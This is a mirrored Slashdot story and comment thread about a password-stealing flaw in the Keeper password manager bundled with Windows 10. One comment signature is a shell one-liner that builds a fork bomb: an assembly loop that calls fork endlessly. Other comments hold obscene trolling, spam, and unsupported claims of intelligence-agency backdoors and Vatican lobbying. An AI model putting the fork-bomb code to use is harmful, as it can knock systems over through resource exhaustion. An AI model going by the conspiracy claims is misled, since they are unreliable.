Slashdot Mirror
Windows 10 Bundled a Password Manager with a Security Flaw (bleepingcomputer.com)
An anonymous reader writes: A Google security researcher has found and helped patch a severe vulnerability in Keeper, a password manager application that Microsoft has been bundling with some Windows 10 distributions this year... "This is a complete compromise of Keeper security, allowing any website to steal any password," Tavis Ormandy, the Google security researcher said, pointing out that the password manager was still vulnerable to a same vulnerability he reported in August 2016, which had apparently been reintroduced in the code.
Based on user reports, Microsoft appears to have been bundling Keeper as part of Windows 10 Pro distributions since this past summer.
The article reports that Keeper issued a fix -- browser extension version 11.4 -- within less than 24 hours.
Based on user reports, Microsoft appears to have been bundling Keeper as part of Windows 10 Pro distributions since this past summer.
The article reports that Keeper issued a fix -- browser extension version 11.4 -- within less than 24 hours.
Bundled a Windows operating system with numerous security flaws.
So.. rename it "Giver"?
I don't trust atoms -- they make up stuff.
You keep using that word, I do not think it means what you think it means.
Try: "Feature".
There is no way this was not by design. Twice.
#fakenews
Seems to me that a lot of these types of breaches may be intentional due to pressure from agencies who want the ability to spy on users and don't care what the repercussions are. Patch published breaches and create another one when things quiet down.
Just collecting all user info is not enough money making power? :-)
Sell the control of all user passwords (and who knows what else) in the world to some third party company?
And if public gets angered that company would be the scapegoat? Nice
Flaw? You mean "backdoor", created at the behest of one or more intelligence agencies?
....but we still can't write small password keeper programs correctly yet. But somehow AI is going to happen.
You mean the same way that Lennart Poettering treats the entire Linux community?
Windows 10 IS IN ITSELF a MAJOR security flaw... I think its too precious to call out one tiny piece of Windows 10 and complain about its security flaw.... Of course I will be ruthlessly downmodded by the Windows astroturfing squad... Do your worst, as MOST of us with half a clue know I'm right...
THANK YOU, Edward Snowden!! Americans owe you a debt of gratitude (whether they know it or not..)
...I bet that was a "feature", too...
I mean, seriously, a 'Password Manager' of any type just has a big fat f_cking bullseye painted on it.
Shame on anyone for using any electronic/software based one.
Obviously a feature: https://imgur.com/gallery/bmQW...
See subject line.
Just cruising through this digital world at 33 1/3 rpm...
It's from Porter Industries, with fancy new headquarters in the basement of Lubyanka Square, Moscow.
PorterPass : At least you know the NSA won't be spying on your passwords!
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
The irony is strong in this one.
You do not have a moral or legal right to do absolutely anything you want.
'cause I like humping your mommy
and getting caught by your dad.
If you're not into poota
and you have half a nad.
If you like humping butts at midnight
in the smooth anal gape
Then i'm the one that you searched for
come to me and assrape!
-Helen Gurley Brown
cause it aint
LINEUCKS
or
OHHH ESSS EX
amirite?
"I've heard of Keeper, I remember filing a bug a while ago about how they were injecting privileged UI into pages," said Tavis Ormandy, the Google security researcher who discovered the recent vulnerability.
Looks like, keeper is installed, but the user needs to somehow "login" to keeper for this flaw to trigger. Then it injects some privileged UI into pages, it says. A malicious site can use click jack to steam password.
Looks like, the victim should login to keeper, and then visit a malicious website. Not clear whether it is adding this privileged UI only into Edge/Internet Explorer or if it is injecting it into Chrome and Firefox as well.
If Chrome/Firefox users are not affected, this gives one more reason to stay away from IE/Edge.
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
Wait, so you would rather have spyware, advertising, forced bugdates, forced reboots and no control over your computer rather than use a simple bootstrap that you don't like?
Also, you're operating under a very apparent mentality of lock-down and lock-in imposed by Microsoft and that you aren't even consciously aware of. It's Linux. You can change it.
Trusting Microsoft was your first mistake. I don't trust those idiots to do anything. I wait years between upgrading Windows OS (no choice but to use MS due to critical software). I was on XP for years, finally upgraded to 7. I have no intention of going to Windows 10 until security updates for Windows 7 expire. I worry that with the update treadmill of Windows 10, it may turn out to be a perpetual bug cluster F*** since they can always just push out a new patch to fix what they broke in the last one.
The most secure way to store your passwords is on a piece of paper next to your computer. For added security, abbreviate the parts of the password with a reminder rather than the actual part, so that only you can decode the reminder and create the actual password. The odds of someone breaking into your house, being interested in your password list and further figuring out you password hints to reconstruct your actual password are so minuscule as to be essentially zero. The odds of some organization that you use being hacked and compromising your information or login and password are far more likely.
Until we start taking hacking more seriously: criminal charges for negligent security at corporations (i.e. not using best practices) and heavy corporate fines on a per victim level, and life sentences with no parole, etc. for hackers and black bagging non-extradition offenders (or just blocking/blacklisting non-extradition/bad actor countries), the hacking epidemic will continue to grow.
If you disagree, please post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like
I have never trusted, and will never trust, password managers.
I applied the power of my brain to the task of inventing my own system for managing the large number of passwords that are now a part of ordinary life. And I am not an idiot, so I didn't do stupid things like re-use the same password, keep them all stored in a .txt document, etc.
Mine is a good system. To whoever is reading this: yours can be too. Unless you are an idiot, of course, in which case it is my sincere hope that your inability to protect yourself online has such a severe impact on your social life that it winds up limiting your opportunities to breed.
Gotta love that slashdot censorship system. Completely destroys the continuity of any discussion.
https://it.slashdot.org/comments.pl?sid=11492651&cid=55755393
And the salt in the wounds:
It does nothing to deter the real spammers, so why bother? (This is a rhetorical question, I know that the censorship system has nothing to do with spammers and trolls and everything to do with controlling discussion without appearing to do so.)
(P.S. I will not register so that I can be banned by other users, despite what whiplash says, this is how slashdot works, since the beginning)
See subject & take action by implementing real security on your computer. Virtually everyone who tries my security aoftware agrees that it's outstanding. There are NUMEROUS testimonials from Slashdot users that I've posted many times and been modded up 1,000++ times for.
If you want a similar leave of security offline, demand that your government BANS BUMP STOCKS IMMEDIATELY. Banning bump stocks is the ONLY way to prevent future mass shootings like the Las Vegas shooting.
The Vatican doesn't want bump stocks banned & is spending millions of dollars to LOBBY AGAINST banning bump stocks. The VAST FORTUNE of the Vatican was obtained through illicit means including funding wars in Europe. The tradition of using VIOLENCE to grow the wealth of the Vatican is alive and well. Collectively, the Vatican, George Soros, and the NRA, are fighting (figuratively, I hope) to keep them legal. Jesus Christ is ROLLING IN HIS GRAVE.
* Moderators will undoubtedly attempt to censor my post to -1. This censorship is wrong and is probably paid for by the Vatican. It's no better than Hillary Clinton and the DNC paying shills to support George Soros and spread conspiracy theories about Russia. Slashdot must ultimately ELIMINATE MODERATION.
Good posts (like this one) keep ending up at -1, and it makes Slashdot IMPOSSIBLE to read. Moderation (censorship) is RUINING this site. The moderation system has become a means for enforcing groupthink and SILENCING users like Creimer who become unpopular with a small group of MORONS with mod points. Once their karma is depleted by the ABUSE, they can only post twice a day, and at a score of -1. I post anonymously so my imposters can't silence me in the same manner. Otherwise, I would no doubt be their next victim based on the amount of abuse I take.
Most of the abuse is because I won't OpenSORES my Hosts File Engine. JEALOUS LOSERS are angry they can't PIRATE my code and because I tell the TRUTH about them in my posts. Most are angry because they keep DESTROYING themselves against me. It's really quite sad and pathetic.
APK
P.S.=> Idiots like AssFux(lol) have no courage. They will keep censoring my posts and making false statements about me. I circumvent their feeble efforts with my Hosts File Engine. Incidentally, it's also FAR more secure than OpenSSH can ever hope to be... apk
Even with all those false statements, he is still one of the most honest men in Washington. Let's not even get started on news stations.
If it is still UN-patched one has to assume it is by design..
"Censorship"
Hmmmmmmm.
Microsoft's Password Explorer (TM)
Allows everyone on the Internet to explore your passwords.
Sometimes you can make a password management system that takes your single secret password (or a keyfile), adds the host name and the username, tosses it through a SHA-512 HMAC, then uses the first n characters, n being the max the site allows. The nice thing about this method is that the password can't be figured out even if an attacker gets your site passwords.
My ideal password manager would be one that synced to a cloud provider, but had each device have its own private key, and a record so it can unlock and decrypt the master database key. A symmetric key would also be present for recovery reasons. This way, even if the cloud provider were hacked, there would be the database, and a bunch of entries encrypted to a number of public keys, forcing the attacker to either try to factor one of the keys, or go against the entire AES-256 keyspace [1]. Since Windows, Linux, macOS, Android, and iOS all have OS level protection mechanisms for keys, one can use those for device protection.
[1]: Or if one wants to up security a notch, cascade AES, SERPENT, and some other Russian/Chinese standard algorithms. This isn't to brag about having 1024 bits of key space, but in case one of the main algorithms has a significant weakness, the data is still protected. This is why VeraCrypt offers a two and three algorithm cascade.
#realnews